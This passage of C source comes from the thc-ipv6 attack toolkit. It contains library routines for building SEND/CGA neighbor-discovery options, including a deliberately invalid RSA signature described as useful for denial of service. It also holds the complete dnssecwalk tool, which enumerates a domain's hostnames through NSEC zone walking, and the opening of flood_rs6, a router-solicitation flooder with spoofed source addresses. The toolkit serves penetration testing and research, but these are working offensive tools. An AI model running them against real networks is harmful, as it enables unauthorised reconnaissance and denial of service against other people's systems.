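    case NXT_UDP:
      uhdr = (thc_udp_hdr *) next;
      ptrs[iptr] = uhdr->data;
      iptr++;
      ptrs[iptr] = (char *) uhdr;
      iptr++;
      break;
    case NXT_IP4_RUDIMENTARY:
      free(next);
      break;
    case NXT_DATA:
      ehdr = (thc_ipv6_ext_hdr *) next;
      ptrs[iptr] = ehdr->data;
      iptr++;
      ptrs[iptr] = (char *) ehdr;
      iptr++;
      break;
    case NXT_PIM:
      ehdr = (thc_ipv6_ext_hdr *) next;
      ptrs[iptr] = ehdr->data;
      iptr++;
      ptrs[iptr] = (char *) ehdr;
      iptr++;
      break;
      // XXX TODO: other protocols
    default:
      if (_thc_ipv6_showerrors)
        fprintf(stderr, "Error: Data packet type %d not implemented - some data not free'ed!\n", type);
    }
  }

  /* free in reverse order of collection; the NULL entry only marks the end */
  ptrs[iptr] = NULL;
  while (iptr >= 0) {
    if (debug)
      printf("free ptrs[%d]=%p\n", iptr, ptrs[iptr]);
    if (ptrs[iptr] != NULL)
      free(ptrs[iptr]);
    iptr--;
  }

  return NULL;
}

/*
 * Print a hex/ASCII dump of len bytes at buf to stdout, 16 bytes per row.
 *
 * text  optional caption; when non-empty it is printed with the byte count
 *       before the dump
 *
 * Nothing is printed for a NULL buffer or a length that is not positive.
 */
void thc_dump_data(unsigned char *buf, int len, char *text) {
  int off, j, n;

  if (buf == NULL || len <= 0)
    return;
  if (text != NULL && text[0] != 0)
    printf("%s (%d bytes):\n", text, len);

  for (off = 0; off < len; off += 16) {
    n = (len - off < 16) ? len - off : 16;   /* bytes present in this row */
    printf("%04hx: ", off);
    for (j = 0; j < 16; j++) {
      if (j < n)
        printf("%02x", buf[off + j]);
      else
        printf(" ");
      if (j % 2 == 1)
        printf(" ");
    }
    printf(" [ ");
    for (j = 0; j < 16; j++) {
      if (j >= n)
        printf(" ");
      else if (isprint(buf[off + j]))
        printf("%c", buf[off + j]);
      else
        printf(".");
    }
    printf(" ]\n");
  }
}

unsigned char *thc_memstr(char *haystack, char *needle, int haystack_length, int needle_length) {
  register int i;

  if (needle_length > haystack_length)
    return NULL;
  for (i = 0; i <= haystack_length - needle_length; i++)
    if (memcmp(haystack + i, needle, needle_length) == 0)
      return (haystack +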
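i);
  return NULL;
}

#ifdef _HAVE_SSL

/* Added by willdamn 2006/07 */

/*
 * Allocate a key holder and generate an RSA key of key_len bits.
 *
 * Returns the new key, or NULL on allocation or key generation failure.
 */
thc_key_t *thc_generate_key(int key_len) {
  thc_key_t *key;

  if ((key = (thc_key_t *) malloc(sizeof(thc_key_t))) == NULL)
    return NULL;
  /* NOTE(review): 65535 is used as public exponent; the customary value is
   * 65537 (RSA_F4) - confirm this is intended. */
  if ((key->rsa = RSA_generate_key(key_len, 65535, NULL, NULL)) == NULL) {
    free(key);                  /* was leaked on this path */
    return NULL;
  }
  key->len = key_len;

  return key;
}

/*
 * Build a CGA option for the given key and derive the matching address.
 *
 * prefix  8 byte network prefix
 * key     RSA key; key->len is overwritten with the DER length of the
 *         public key
 * cga     receives a newly allocated 16 byte address (prefix followed by
 *         the first 8 bytes of the SHA1 hash, masked with 0x1c)
 *
 * Returns the new option header (type 11) or NULL on failure; on failure
 * everything allocated here has been released.
 */
thc_cga_hdr *thc_generate_cga(unsigned char *prefix, thc_key_t * key, unsigned char **cga) {
  thc_cga_hdr *cga_hdr;
  unsigned char md_value[EVP_MAX_MD_SIZE];
  unsigned char *p, *tmp;
  int klen, klen2, rand_fd, cgasize, got;

  if (prefix == NULL || key == NULL || cga == NULL)
    return NULL;
  if ((cga_hdr = (thc_cga_hdr *) malloc(sizeof(thc_cga_hdr))) == NULL)
    return NULL;
  cga_hdr->type = 11;
  cga_hdr->pub_key = NULL;      /* lets the shared failure path free unconditionally */
  cga_hdr->pad = NULL;

  /* prepare CGA paramater */
  /* CGA header & mod_value, prefix, collision_count from CGA parameter */
  cgasize = 29;
  if ((rand_fd = open("/dev/urandom", O_RDONLY)) < 0) {
    if (_thc_ipv6_showerrors)
      printf("Cannot open source of randomness!\n");
    goto fail;
  }
  got = read(rand_fd, cga_hdr->modifier, 16);
  close(rand_fd);
  if (got != 16) {              /* a short read would leave the modifier uninitialised */
    if (_thc_ipv6_showerrors)
      printf("Cannot read from source of randomness!\n");
    goto fail;
  }

  /* DER-encode public key */
  klen = i2d_RSA_PUBKEY(key->rsa, NULL);
  if (klen <= 0)
    goto fail;
  if ((cga_hdr->pub_key = (unsigned char *) malloc(klen)) == NULL)
    goto fail;
  p = cga_hdr->pub_key;
  klen2 = i2d_RSA_PUBKEY(key->rsa, &p);
  if (klen2 != klen)
    goto fail;
  key->len = klen;
  cgasize += klen;
  cga_hdr->collision_cnt = 0;
  memcpy(cga_hdr->prefix, prefix, 8);

  if ((tmp = malloc(cgasize - 4)) == NULL) {
    if (_thc_ipv6_showerrors)
      perror("tmp malloc ");
    goto fail;
  }
  /* presumably modifier, prefix and collision_cnt are laid out back to
   * back in thc_cga_hdr (16 + 8 + 1 bytes) - verify against the header */
  memcpy(tmp, cga_hdr->modifier, 25);
  memcpy(tmp + 25, cga_hdr->pub_key, klen);
  /* compute hash1 */
  SHA1(tmp, cgasize - 4, md_value);
  free(tmp);

  /* the option length is counted in units of 8 bytes */
  if (cgasize % 8 == 0) {
    cga_hdr->len = cgasize / 8;
    cga_hdr->pad_len = 0;
  } else {
    cga_hdr->len = cgasize / 8 + 1;
    cga_hdr->pad_len = cga_hdr->len * 8 - cgasize;
    if ((cga_hdr->pad = (char *) calloc(1, cga_hdr->pad_len)) == NULL)
      goto fail;
  }

  /* Prepare CGA */
  if ((*cga = (unsigned char *) malloc(16)) == NULL)
    goto fail;
  memcpy(*cga, prefix, 8);
  /* add address identifier to cga */
  memcpy(*cga + 8, md_value, 8);
  /* set "U" & "G" bits ; currently sec equals 0 */
  *(*cga + 8) &= 0x1c;

  // XXX BUG TODO FIXME:
  // here must be something missing in will's code.
  // cga is not pointed to by cga_hdr when we return
  return cga_hdr;

fail:
  free(cga_hdr->pad);
  free(cga_hdr->pub_key);
  free(cga_hdr);
  return NULL;
}

/*
 * Allocate a timestamp option (type 13, length 2) for the current time.
 *
 * The seconds value is shifted left by 16 bits and byte-swapped before it
 * is stored. Returns NULL when the allocation fails.
 */
thc_timestamp_hdr *generate_timestamp(void) {
  thc_timestamp_hdr *timestamp;
  struct timeval time;

  if ((timestamp = (thc_timestamp_hdr *) calloc(1, sizeof(thc_timestamp_hdr))) == NULL)
    return NULL;
  timestamp->type = 13;
  timestamp->len = 2;
  gettimeofday(&time, NULL);
  timestamp->timeval = bswap_64(time.tv_sec << 16);

  return timestamp;
}

/*
 * Allocate a nonce option (type 14).
 *
 * The six nonce bytes are the fixed pattern 0a 0c 0e 0a 0c 0e, not random
 * data. Returns NULL when the allocation fails.
 */
thc_nonce_hdr *generate_nonce(void) {
  thc_nonce_hdr *nonce;

  /* calloc, as in generate_timestamp(), so no field is left uninitialised */
  if ((nonce = (thc_nonce_hdr *) calloc(1, sizeof(thc_nonce_hdr))) == NULL)
    return NULL;
  nonce->type = 14;
  nonce->nonce[0] = nonce->nonce[3] = 0xa;
  nonce->nonce[1] = nonce->nonce[4] = 0xc;
  nonce->nonce[2] = nonce->nonce[5] = 0xe;
  nonce->len = sizeof(thc_nonce_hdr) / 8;

  return nonce;
}

/*
 * Build an RSA signature option (type 12).
 *
 * data2sign      bytes to sign
 * data2sign_len  length of data2sign; when it is not positive, 20 random
 *                bytes are signed instead of a hash of the data
 * cga_hdr        CGA option holding the DER encoded public key
 * key            RSA key; key->len must be the length of cga_hdr->pub_key
 *
 * The signature buffer is allocated at the padded option size
 * (len * 8 - 20 bytes) and zero filled, so a consumer copying that many
 * bytes from ->sign stays inside the allocation.
 *
 * Returns the option header or NULL on failure.
 */
thc_rsa_hdr *thc_generate_rsa(char *data2sign, int data2sign_len, thc_cga_hdr * cga_hdr, thc_key_t * key) {
  thc_rsa_hdr *rsa_hdr;
  unsigned char md_value[EVP_MAX_MD_SIZE], hash[20];
  int rsa_hdr_len, rsa_size, padded, fd, got;
  unsigned int sign_len = 0;

  if (cga_hdr == NULL || key == NULL)
    return NULL;
  if ((rsa_hdr = (thc_rsa_hdr *) malloc(sizeof(thc_rsa_hdr))) == NULL)
    return NULL;
  rsa_hdr->type = 12;
  rsa_hdr->sign = NULL;
  rsa_hdr->pad = NULL;

  /* compute public key hash */
  SHA1(cga_hdr->pub_key, key->len, md_value);
  memcpy(rsa_hdr->key_hash, md_value, 16);

  /* If cga type tag's unknown set a bad RSA signature, e.g useful for DoS */
  if (data2sign_len > 0 && data2sign != NULL)
    SHA1((unsigned char *) data2sign, data2sign_len, hash);
  else {
    if ((fd = open("/dev/urandom", O_RDONLY)) < 0)
      goto fail;
    got = read(fd, hash, 20);
    close(fd);
    if (got != 20)
      goto fail;
  }

  rsa_size = RSA_size(key->rsa);
  if (rsa_size <= 0)
    goto fail;
  /* round 20 + signature up to a multiple of 8, then take off the 20 */
  padded = ((20 + rsa_size + 7) / 8) * 8 - 20;
  if ((rsa_hdr->sign = calloc(1, padded)) == NULL)
    goto fail;

  if (RSA_sign(NID_sha1, hash, 20, rsa_hdr->sign, &sign_len, key->rsa) == 0) {
    if (_thc_ipv6_showerrors)
      printf("Error during generating RSA signature! \n");
    goto fail;
  }

  rsa_hdr_len = 20 + (int) sign_len;
  if (rsa_hdr_len % 8 == 0) {
    rsa_hdr->len = rsa_hdr_len / 8;
    rsa_hdr->pad = NULL;
  } else {
    rsa_hdr->len = rsa_hdr_len / 8 + 1;
    if ((rsa_hdr->pad = calloc(1, rsa_hdr->len * 8 - rsa_hdr_len)) == NULL)
      goto fail;
  }

  return rsa_hdr;

fail:
  free(rsa_hdr->sign);
  free(rsa_hdr);
  return NULL;
}

/*
 * Append an ICMPv6 ND message carrying SEND options to a packet.
 *
 * pkt, pkt_len   packet handle and its running length; both are updated
 * type, code,
 * flags          ICMPv6 header fields
 * data, data_len optional ND options placed in front of the SEND options
 * cga_hdr, key   CGA option and RSA key, as produced by thc_generate_cga()
 * tag            16 byte CGA message type tag; when NULL the RSA option is
 *                built over random bytes instead of the message
 * checksum       0 requests automatic checksum calculation
 *
 * Option order: data, CGA, timestamp, nonce, RSA signature.
 * Returns 0 on success, -1 on failure. The ICMPv6 header is linked into
 * the packet before the options are built, so it stays owned by the packet
 * on failure as well.
 */
int thc_add_send(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int data_len, thc_cga_hdr * cga_hdr, thc_key_t * key, unsigned char *tag, int checksum) {
  thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt;
  thc_icmp6_hdr *ihdr = malloc(sizeof(thc_icmp6_hdr));
  thc_ipv6_ext_hdr *ehdr;
  thc_nonce_hdr *nonce_hdr = NULL;
  thc_timestamp_hdr *timestamp_hdr = NULL;
  thc_rsa_hdr *rsa_hdr = NULL;
  unsigned char *ndp_opt_buff, *data2sign = NULL;
  char *buff;
  int ndp_opt_len, data2sign_len, offset;

  /* build standard part of ND message */
  if (ihdr == NULL)
    return -1;
  memset(ihdr, 0, sizeof(thc_icmp6_hdr));

  if (hdr->final != NULL) {
    ehdr = (thc_ipv6_ext_hdr *) hdr->final;
    ehdr->next_segment = (char *) ihdr;
    ehdr->next = NXT_ICMP6;
  } else {
    hdr->next_segment = (char *) ihdr;
    hdr->next = NXT_ICMP6;
  }
  hdr->final = (char *) ihdr;
  hdr->final_type = NXT_ICMP6;

  ihdr->type = type;
  ihdr->code = code;
  ihdr->flags = flags;

  if (checksum == 0) {
    ihdr->checksum = DO_CHECKSUM;
  } else
    ihdr->checksum = checksum;

  if (data_len > 0 && data != NULL)
    ndp_opt_len = data_len;
  else
    ndp_opt_len = 0;

  hdr->length += 8;
  *pkt_len += 8;

  /* add various security features to ND message */
  /* determine options' total length */
  if (cga_hdr == NULL || key == NULL || cga_hdr->pub_key == NULL)
    return -1;
  /* the CGA option is copied as 29 header bytes plus key->len key bytes;
   * both must fit into the option length announced in cga_hdr->len */
  if (key->len < 0 || 29 + key->len > cga_hdr->len * 8)
    return -1;
  ndp_opt_len += cga_hdr->len * 8;

  if ((timestamp_hdr = generate_timestamp()) == NULL)
    return -1;
  ndp_opt_len += timestamp_hdr->len * 8;

  if ((nonce_hdr = generate_nonce()) == NULL) {
    free(timestamp_hdr);
    return -1;
  }
  ndp_opt_len += nonce_hdr->len * 8;

  /* create options buffer; zero filled so option padding does not carry
   * stale heap contents into the packet */
  if ((ndp_opt_buff = (unsigned char *) calloc(1, ndp_opt_len)) == NULL) {
    free(timestamp_hdr);
    free(nonce_hdr);
    return -1;
  }
  offset = 0;
  /* same condition as used for the length above, so a stray data pointer
   * with a non-positive length is never copied */
  if (data != NULL && data_len > 0) {
    memcpy(ndp_opt_buff + offset, data, data_len);
    offset += data_len;
  }

  /* CGA option */
  memcpy(ndp_opt_buff + offset, cga_hdr, 29);
  memcpy(ndp_opt_buff + offset + 29, cga_hdr->pub_key, key->len);
  offset += (cga_hdr->len * 8);

  /* timestamp option */
  memcpy(ndp_opt_buff + offset, timestamp_hdr, timestamp_hdr->len * 8);
  offset += timestamp_hdr->len * 8;
  free(timestamp_hdr);

  /* nonce option */
  memcpy(ndp_opt_buff + offset, nonce_hdr, nonce_hdr->len * 8);
  offset += nonce_hdr->len * 8;
  free(nonce_hdr);

  /* RSA signature
   * If CGA message type tag given compute correct RSA signature
   * otherwise set option with incorrect one */
  if (tag != NULL) {
    data2sign_len = 52 + ndp_opt_len;
    if ((data2sign = (unsigned char *) malloc(data2sign_len)) == NULL) {
      free(ndp_opt_buff);
      return -1;
    }
    memcpy(data2sign, tag, 16);
    memcpy(data2sign + 16, hdr->src, 16);
    memcpy(data2sign + 32, hdr->dst, 16);

    /* compute icmp checksum that is needed to compute rsa signature */
    if ((buff = malloc(8 + ndp_opt_len)) == NULL) {
      free(data2sign);
      free(ndp_opt_buff);
      return -1;
    }
    memcpy(buff, ihdr, 8);
    memcpy(buff + 8, ndp_opt_buff, ndp_opt_len);
    ihdr->checksum = checksum_pseudo_header(hdr->src, hdr->dst, NXT_ICMP6, buff, 8 + ndp_opt_len);
    free(buff);
    memcpy(data2sign + 48, &ihdr->type, 4);
    /* NOTE(review): this leaves the checksum at 0 rather than DO_CHECKSUM,
     * whatever the caller passed - confirm that is intended */
    ihdr->checksum = 0;
    memcpy(data2sign + 52, ndp_opt_buff, ndp_opt_len);
  } else
    data2sign_len = -1;

  if ((rsa_hdr = thc_generate_rsa((char *) data2sign, data2sign_len, cga_hdr, key)) == NULL) {
    free(ndp_opt_buff);
    free(data2sign);
    return -1;
  }

  ihdr->data_len = ndp_opt_len + rsa_hdr->len * 8;
  free(data2sign);

  /* create 'real' buffer for NDP options */
  if ((ihdr->data = (unsigned char *) malloc(ihdr->data_len)) == NULL) {
    free(ndp_opt_buff);
    free(rsa_hdr->sign);
    free(rsa_hdr->pad);
    free(rsa_hdr);
    return -1;
  }
  memcpy(ihdr->data, ndp_opt_buff, ndp_opt_len);
  free(ndp_opt_buff);

  /* RSA signature option */
  memcpy(ihdr->data + ndp_opt_len, rsa_hdr, 20);
  memcpy(ihdr->data + ndp_opt_len + 20, rsa_hdr->sign, rsa_hdr->len * 8 - 20);

  hdr->length += ihdr->data_len;
  *pkt_len += ihdr->data_len;

  /* the option was copied into ihdr->data; release all of it, not only
   * the header structure */
  free(rsa_hdr->sign);
  free(rsa_hdr->pad);
  free(rsa_hdr);

  return 0;
}

#endif

int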
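thc_bind_udp_port(int port) {
  /*
   * Open an IPv6 UDP socket bound to the wildcard address on `port`.
   *
   * Where the platform defines them, SO_REUSEPORT, SO_REUSEADDR,
   * IPV6_PKTINFO (else IPV6_RECVPKTINFO) and IPV6_V6ONLY are switched on
   * before bind(); their results are not checked (best effort). With
   * address/port reuse enabled another socket may be bound to the same
   * port, so datagrams arriving here should not be assumed exclusive.
   *
   * Returns the socket descriptor, or -1 on failure with nothing left open.
   */
  int on = 1, s;
  struct addrinfo hints, *res = NULL;
  char pbuf[16];

  if (port < 0 || port > 65535)
    return -1;

  memset(&hints, 0, sizeof(hints));
  hints.ai_family = AF_INET6;
  hints.ai_socktype = SOCK_DGRAM;
  hints.ai_protocol = IPPROTO_UDP;
  hints.ai_flags = AI_PASSIVE;
  snprintf(pbuf, sizeof(pbuf), "%d", port);

  /* getaddrinfo() reports failure with any non-zero value */
  if (getaddrinfo(NULL, pbuf, &hints, &res) != 0 || res == NULL)
    return -1;
  if ((s = socket(res->ai_family, res->ai_socktype, res->ai_protocol)) < 0) {
    freeaddrinfo(res);
    return -1;
  }
#ifdef SO_REUSEPORT
  setsockopt(s, SOL_SOCKET, SO_REUSEPORT, &on, sizeof(on));
  printf("reuseport\n");
#endif
#ifdef SO_REUSEADDR
  setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));
#endif
#ifdef IPV6_PKTINFO
  setsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, &on, sizeof(on));
#else
  setsockopt(s, IPPROTO_IPV6, IPV6_RECVPKTINFO, &on, sizeof(on));
#endif
#ifdef IPV6_V6ONLY
  setsockopt(s, IPPROTO_IPV6, IPV6_V6ONLY, &on, sizeof(on));
#endif
  if (bind(s, res->ai_addr, res->ai_addrlen) < 0) {
    close(s);                   /* descriptor and address list were leaked here */
    freeaddrinfo(res);
    return -1;
  }
  freeaddrinfo(res);

  return s;
}

/*
 * Join an IPv6 multicast group on a socket.
 *
 * s          socket descriptor
 * interface  name of the interface to join on
 * src        16 byte IPv6 multicast group address (binary form)
 *
 * Returns 0 on success, -1 on bad arguments, an unknown interface or a
 * failing setsockopt().
 */
int thc_bind_multicast_to_socket(int s, char *interface, char *src) {
  struct ipv6_mreq mreq6;
  unsigned int ifindex;

  if (src == NULL || interface == NULL || s < 0)
    return -1;
  /* if_nametoindex() returns 0 for an unknown name; passing that on would
   * let the kernel pick an interface instead of reporting the error */
  if ((ifindex = if_nametoindex(interface)) == 0)
    return -1;

  memset(&mreq6, 0, sizeof(mreq6));
  mreq6.ipv6mr_interface = ifindex;
  memcpy(&mreq6.ipv6mr_multiaddr, src, 16);
  if (setsockopt(s, IPPROTO_IPV6, IPV6_JOIN_GROUP, &mreq6, sizeof(mreq6)) < 0)
    return -1;

  return 0;
}
thc-ipv6-2.5/dnssecwalk.c0000644000000000000000000002306612251022434014022 0ustar rootroot/* * Simple DNSSEC walker requiring no special libraries. * * (c) 2013 by Marc "van Hauser" Heuse or * The AGPL v3 license applies to this code.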
* * Works against DNSSEC servers which have NSEC enabled (default) * instead of NSEC3 :-) * * Compile simply as gcc -O2 -o dnssecwalk dnssecwalk.c * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define RETRY 5 int debug = 0, errcnt = 0, sock, ensure = 0, dores = -1; char *dst, first[256], beforesub[256], firstsub[256]; int dnssocket(char *server) { struct addrinfo *ai; struct addrinfo hints; int s; memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_DGRAM; hints.ai_protocol = IPPROTO_UDP; if (getaddrinfo(server, "53", &hints, &ai) != 0) { fprintf(stderr, "Error: unable to resolve dns server %s\n", dst); exit(-1); } if ((s = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol)) < 0) { fprintf(stderr, "Error: unable to get a socket %s\n", dst); exit(-1); } if (connect(s, ai->ai_addr, ai->ai_addrlen) < 0) { fprintf(stderr, "Error: unable to connect to dns server %s\n", dst); exit(-1); } freeaddrinfo(ai); return s; } void noreply(int signo) { ++errcnt; if (errcnt < RETRY) { fprintf(stderr, "Warning: DNS server timeout (%d of %d retries)\n", errcnt, RETRY); close(sock); sock = -1; return; } else { fprintf(stderr, "Error: Giving up on DNS server, too many timeouts\n"); exit(1); } } int main(int argc, char **argv) { unsigned char buf[1024], buf2[1024]; char *ptr, *ptr2, nexthost[256], domain[256]; char b1[] = { 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char b2[] = { 0x00, 0x2f, 0x00, 0x01 }; int pid = getpid(), dlen = 0, i = 0, fixi, len, ok = 1, cnt = 0, errcntbak, sub = 0; struct addrinfo hints, *res, *p; struct sockaddr_in6 *ipv6, *q; struct sockaddr_in *ipv4, *q4; char ipv4str[16], ipv6str[40]; void *addr, *addr4; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc < 3) { printf("%s v1.2 (c) 2013 by Marc Heuse http://www.mh-sec.de\n\n", argv[0]); printf("Syntax: %s [-e46] dns-server domain\n\n", argv[0]); 
printf("Options:\n -e ensure that the domain is present in found addresses, quit otherwise\n -4 resolve found entries to IPv4 addresses\n -6 resolve found entries to IPv6 addresses\n\n"); printf("Perform DNSSEC NSEC walking.\n\nExample: %s dns.test.com test.com\n", argv[0]); exit(0); } while ((i = getopt(argc, argv, "e46")) >= 0) { switch(i) { case 'e': ensure = 1; break; case '4': if (dores == -1) dores = AF_INET; else dores = 0; break; case '6': if (dores == -1) dores = AF_INET6; else dores = 0; break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } dst = argv[optind]; sock = dnssocket(dst); for (i = 0; i < strlen(argv[optind]); i++) argv[optind][i] = (char)tolower((int)argv[optind][i]); for (i = 0; i < strlen(argv[optind + 1]); i++) argv[optind + 1][i] = (char)tolower((int)argv[optind + 1][i]); if (index(argv[optind + 1], '.') == NULL) { fprintf(stderr, "Error: not a valid domain (must be at least \".\"): %s\n", argv[optind + 1]); exit(-1); } strncpy(domain, argv[optind + 1], sizeof(nexthost) - 2); domain[sizeof(domain) - 2] = 0; if (domain[strlen(domain) - 1] != '.') strcat(domain, "."); strncpy(nexthost, argv[optind + 1], sizeof(nexthost) - 1); nexthost[sizeof(nexthost) - 1] = 0; memcpy(buf, (char *) &pid + _TAKE2, 2); memcpy(buf + 2, b1, sizeof(b1)); i = 2 + sizeof(b1); fixi = i; if (dores >= 0) { memset((char*)&hints, 0, sizeof(hints)); hints.ai_family = dores; } printf("Starting DNSSEC walking on server %s about %s\n", dst, domain); while (ok == 1) { ptr = nexthost; i = fixi; // domain-encoded-here foo.com == \x03foo\x03com\x00 == dlen if (strcmp(ptr, ".") != 0) do { if ((ptr2 = index(ptr, '.')) != NULL) *ptr2 = 0; len = strlen(ptr); buf[i++] = len; memcpy(buf + i, ptr, len); i += len; dlen += (len + 1); ptr = ptr2; if (ptr != NULL) ptr++; } while (ptr != NULL && *ptr != 0); buf[i++] = 0; memcpy(buf + i, b2, sizeof(b2)); i += sizeof(b2); dlen = i; resend: if (send(sock, buf, dlen, 0) < 0) { fprintf(stderr, "Error: can not send to 
network\n"); exit(-1); } if (debug) { len = i; for (i = 0; i < len; i++) { if (i % 16 == 0) printf(" "); if (i % 8 == 0) printf(" "); printf("%02x ", buf[i]); if (i % 16 == 15) printf("\n"); } printf("\n\n"); } errcntbak = errcnt; signal(SIGALRM, noreply); alarm(5); memset(buf2, 0, sizeof(buf2)); len = recv(sock, buf2, sizeof(buf2), 0); alarm(0); if (sock == -1) sock = dnssocket(dst); if (len == 0 && errcntbak == errcnt) errcnt++; if ((errcntbak != errcnt) && errcnt > 0 && errcnt <= RETRY) goto resend; if (RETRY < errcnt) noreply(0); if ((buf2[3] & 9) == 9 || (buf2[3] & 15) == 2) { printf("Result: server not responsible for domain %s\n", nexthost); exit(1); } else if (buf2[3] == 5) { printf("Result: server does not support NSEC, dnssec walking not possible\n"); exit(1); } else if ((buf2[3] & 15) > 0) { printf("Result: unknown error (%d)\n", (buf2[3] & 15)); exit(1); } else if (buf2[7] != 1) { printf("Result: server does not support NSEC, dnssec walking not possible\n"); exit(1); } ptr = (char *) (buf2 + i); while (ptr < (char *) (buf2 + len) && *ptr != 0x2f) ptr++; ptr += 9; ptr2 = ptr + 1; i = *ptr; if (*ptr == 0) { ptr++; } else { while (i != 0) { ptr += i + 1; i = *ptr; *ptr = '.'; } } *ptr++ = '.'; *ptr = 0; if (*ptr2 != 0) { for (i = 0; i < strlen(ptr2); i++) ptr2[i] = (char)tolower((int)ptr2[i]); if (strcasecmp(ptr2, domain) == 0) ok = 2; else { if (sub == 1) { if (strcmp(firstsub, ptr2) == 0 || strcmp(beforesub, ptr2) == 0) { fprintf(stderr, "Error: loop detected (sub), aborting\n"); exit(-1); } } if (cnt != 0) { if ((ptr2[2 + strlen(ptr2)] & 2) == 2) { fprintf(stderr, "Warning: start of a sub domain: %s - following items can not be enumerated automatically (don't blame the tool, NSEC is broken. 
Brute force the next valid hostname and rerun the tool with hostname++.domain.)\n", nexthost); sub = 1; strcpy(beforesub, nexthost); strncpy(firstsub, ptr2, sizeof(firstsub) - 1); firstsub[sizeof(firstsub) - 1] = 0; } if (strcmp(ptr2, first) == 0 || strcmp(ptr2, nexthost) == 0) { fprintf(stderr, "Error: loop detected, aborting\n"); exit(-1); } strncpy(nexthost, ptr2, sizeof(nexthost) - 1); nexthost[sizeof(nexthost) - 1] = 0; } else { strncpy(nexthost, ptr2, sizeof(nexthost) - 1); nexthost[sizeof(nexthost) - 1] = 0; strcpy(first, nexthost); } if (ensure && strstr(nexthost, domain) == NULL) { fprintf(stderr, "Error: domain %s not found in result %s, exiting\n", domain, nexthost); exit(-1); } if (dores != -1) { if (getaddrinfo(nexthost, NULL, &hints, &res) == 0) { printf("Found: %s", nexthost); q = NULL; q4 = NULL; for (p = res; p != NULL; p = p->ai_next) { if (p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); // convert the IP to a string and print it: if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); printf(" => %s", ipv6str); } } else if (p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); printf(" => %s", ipv4str); } } } printf("\n"); freeaddrinfo(res); // free the linked list } else printf("Found: %s\n", nexthost); } else printf("Found: %s\n", nexthost); cnt++; errcnt = 0; } } else ok = 0; if (ok == 0) { for (i = 0; i < len; i++) { if (i % 16 == 0) printf(" "); if (i % 8 == 0) printf(" "); printf("%02x ", buf2[i]); if (i % 16 == 15) printf("\n"); } printf("\n"); } } if (ok == 2) printf("Done, %d entries found.\n", cnt); close(sock); if (ok == 2) return 0; else return -1; } thc-ipv6-2.5/flood_rs6.c0000644000000000000000000000723012256337476013600 
0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" extern int debug; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-sS] interface [target]\n\n", prg); printf("Flood the local network with ICMPv6 Router Soliciation packets.\n"); printf("Option -s uses random source IPv6 addresses. Option -S also randomizes the MAC.\n"); // printf("-F/-D/-H add fragment/destination/hopbyhop header to bypass simple filters\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface; unsigned char mac[6] = "", *mac6 = mac; unsigned char buf[1460]; unsigned char *dst = thc_resolve6("ff02::1"), *src = NULL, *dstmac = NULL; int i, k, type = NXT_ICMP6, offset = 14, mychecksum, prefer = PREFER_LINK; unsigned char *pkt2 = NULL; int pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0; int until = 0, rand_src = 0, rand_mac = 0; thc_ipv6_hdr *hdr = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "sSDFH")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 's': rand_src = 1; break; case 'S': rand_mac = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; if (argc - optind > 1) { if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: could not resolve %s\n", argv[optind + 1]); exit(-1); } if (dst[0] >= 0x20 && dst[0] <= 0xfd) prefer = PREFER_GLOBAL; } dstmac = thc_get_mac(interface, src, dst); src = thc_get_own_ipv6(interface, dst, prefer); mac6 = thc_get_own_mac(interface); if (mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(buf, 0, sizeof(buf)); 
